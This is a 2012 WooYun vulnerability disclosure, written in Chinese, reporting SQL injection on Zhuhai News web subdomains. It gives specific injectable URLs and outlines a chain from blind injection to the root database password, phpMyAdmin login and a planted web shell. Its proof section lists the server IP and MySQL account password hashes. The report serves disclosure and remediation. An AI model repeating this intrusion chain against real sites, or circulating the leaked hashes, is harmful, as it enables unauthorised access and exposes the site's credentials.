漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-010096
漏洞标题:珠海新闻网注射漏洞
相关厂商:珠海新闻网
漏洞作者: 小乖
提交时间:2012-07-24 17:09
修复时间:2012-09-07 17:09
公开时间:2012-09-07 17:09
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-07-24: 细节已通知厂商并且等待厂商处理中
2012-07-27: 厂商已经确认,细节仅向厂商公开
2012-08-06: 细节向核心白帽子及相关领域专家公开
2012-08-16: 细节向普通白帽子公开
2012-08-26: 细节向实习白帽子公开
2012-09-07: 细节向公众公开
简要描述:
存在注射漏洞,可以直接getshell,在珠海当地的网站里影响应该蛮大的0.0如果在上面说gov点神马不知道会咋样..
详细说明:
http://admin.zhnews.net/phpinfo.php 信息泄露,可获得路径.
http://admin.zhnews.net/vote/vote.php?ud_id=71 sql注入.但不是root权限.
旁注http://app2.zhnews.net/zt/2012/0507/content.php?id=1144 SQL注入而且是root权限.
可以通过注射app2.zhews.net获得root的密码(盲注),然后再登陆http://admin.zhnews.net/phpmyadmin/ 通过phpinfo.php得到了路径 备份个shell就拿到权限了.没做提权测试
漏洞证明:
Target: http://app2.zhnews.net/zt/2012/0507/content.php?id=1144
Host IP: 202.105.182.51
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL time based
Resp. Time(avg): 36 ms
Current User: root@localhost
Sql Version: 5.0.45
Current DB: app2
System User: root@localhost
Host Name: admin.admin.zhnews.net
Installation dir: /usr/
DB User & Pass:
root:76ada3ea733b60de:localhost
root:76ada3ea733b60de:admin.admin.zhnews.net
root:76ada3ea733b60de:127.0.0.1
adm?n:586a12733746855a:localhost
3pp:6aca39b611f230da:localhout
art:0ee1364e1a?5f528:localhost
openx:2aafe8?c2c1eba7e:localhost
zhibo:1b2f57483270935b:localhost
app2:1220cdd3072aa8ff:localhost
ucenter:7aa7dcf1126d3016:localhost
Data Bases: information_schema
0517_vote
admin
anymedia
app
app2
art
gallery
mysql
openx
qctmh
test
ucenter
vote
vote2
vote_detail_0819bak
zhibo
zhnews
zt
修复方案:
降权,删phpinfo.php,防止php注入(0.0咋说,修改代码啥的) .呃,你比我专业多了. 我随便吐槽的
版权声明:转载请注明来源 小乖@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:9
确认时间:2012-07-27 17:22
厂商回复:
CNVD确认并复现所述情况,由CNVD直接联系网站管理方处置。
按部分影响机密性、部分影响完整性进行评分,rank=6.42*1.1*1.2=8.474
最新状态:
暂无